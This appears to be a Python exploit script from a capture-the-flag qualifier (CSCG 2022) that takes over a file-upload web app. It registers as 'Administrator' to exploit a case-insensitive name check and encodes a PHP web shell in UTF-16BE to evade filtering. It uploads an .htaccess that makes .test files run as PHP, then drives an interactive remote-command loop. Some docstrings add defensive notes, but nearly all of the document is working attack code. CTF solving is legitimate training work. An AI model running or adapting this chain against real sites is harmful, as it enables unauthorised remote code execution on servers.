Last active
June 3, 2022 07:53
Cyber Security Challenge Germany 2022 Qualifiers - File-Upload Challenge
import requests | |
# Endpoints of the CTF challenge instance this script talks to.
base_url = "https://6a4f4da9a8be425de24e8228-file-upload.challenge.master.cscg.live:31337"
register_url = base_url + "/register.php"
login_url = base_url + "/login.php"
upload_url = base_url + "/upload.php"
dir_url = base_url + "/uploads/"

# Keep this exact spelling: the first bug depends on registering this name.
username = "Administrator"
# Throwaway credential for the account created on the challenge instance.
password = "test123"
#First bug : | |
#Getting Admin access by signing up as Administrator (case insensitive!)
def register_administrator(username, password):
    """Submit the registration form and report the outcome.

    Posts ``username`` and ``password`` to ``register_url``; the password is
    sent twice, as ``password`` and ``confirm_password``. Returns a fixed
    success message when the server answers HTTP 200. Any other status ends
    the script through ``exit("Error")``.

    NOTE(review): the author's note says the challenge treats usernames
    case-insensitively, which is how a self-registered account ends up with
    admin access. The server code is not shown here. The defensive lesson is
    to canonicalise usernames the same way in the uniqueness check and in
    the privilege lookup.
    """
    form = {
        'username': username,
        'password': password,
        'confirm_password': password,
    }
    response = requests.post(register_url, data=form)
    if response.status_code != 200:
        exit("Error")
    return "Register as administrator successful!"
def login(username, password):
    """Log in and return the authenticated ``requests.Session``.

    Posts the credentials to ``login_url`` on a fresh session so that any
    cookies the server sets are kept for later requests. Returns the session
    when the server answers HTTP 200. Any other status ends the script
    through ``exit("Error")``.
    """
    session = requests.Session()
    credentials = {'username': username, 'password': password}
    reply = session.post(login_url, data=credentials)
    if reply.status_code == 200:
        return session
    exit("Error")
#Generating our web shell | |
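def generate_php_file(filename, script):
    """Write ``script`` to ``filename`` encoded as UTF-16BE.

    Args:
        filename: Path of the file to create or overwrite.
        script: Text to store. The ``utf-16be`` codec writes two bytes per
            BMP character and no byte-order mark.

    The file is opened in a ``with`` block so the handle is closed even when
    the write raises.

    NOTE(review): the encoding presumably stops the stored bytes matching a
    byte-level content filter. The server code is not shown, so confirm this
    against the challenge. For defenders: inspecting upload content is not
    enough on its own if the server can later be told to interpret the file
    in a different encoding.
    """
    with open(filename, 'wb') as phpfile:
        phpfile.write(script.encode('utf-16be'))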
#Generating the htaccess file | |
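def generate_htacess():
    """Create ``.htaccess`` in the current directory with four directives.

    The file maps the ``.test`` extension to the PHP handler, turns on
    ``zend.multibyte`` and ``zend.detect_unicode`` so PHP accepts
    multibyte-encoded source, and turns on ``display_errors``.

    The file is opened in a ``with`` block so the handle is closed even when
    a write raises.

    Defensive note: this only has an effect when the upload directory
    honours per-directory overrides. Serving uploads from a location with
    ``AllowOverride None`` and no script handler, and rejecting dotfile
    names on upload, removes the primitive.
    """
    directives = (
        b'AddType application/x-httpd-php .test\n',
        b'php_value zend.multibyte 1\n',
        b'php_value zend.detect_unicode 1\n',
        b'php_value display_errors 1\n',
    )
    with open('.htaccess', 'wb') as htaccess:
        htaccess.writelines(directives)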
#Getting our juicy RCE ! | |
def rce():
    """Interactive loop: read a command, request it, print the response.

    Each round reads a line from stdin, appends it to
    ``dir_url + 'webshell.test?cmd='``, fetches that URL with the
    module-level session ``s`` and prints the response body. The loop ends
    when the operator answers ``y`` to the follow-up prompt.

    Detection note: the command travels in the query string, so every round
    appears in the web server's access log as a GET to a file under the
    uploads directory with a ``cmd`` parameter.
    """
    while True:
        cmd = input('Command = ').strip()
        response = s.get(dir_url + 'webshell.test?cmd=' + cmd)
        print(response.text)
        if input('Enough ? (y/n)').strip() == 'y':
            break
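# Build both files locally, then register, log in and upload them.
generate_htacess()
generate_php_file("webshell.test", "<?php system($_GET['cmd']); die(); ?>")
print(register_administrator(username, password))
s = login(username, password)

# .htaccess goes first, then the .test file. Each file is opened in a `with`
# block so the handle is closed after its upload, and each response is
# checked (the original only inspected the second one).
for upload_name in ('.htaccess', 'webshell.test'):
    with open(upload_name, 'rb') as upload_file:
        r = s.post(upload_url, files={'fileToUpload': upload_file})
    if r.status_code != 200:
        exit("Upload Failure!")

print("Uplaod Success !")
rce()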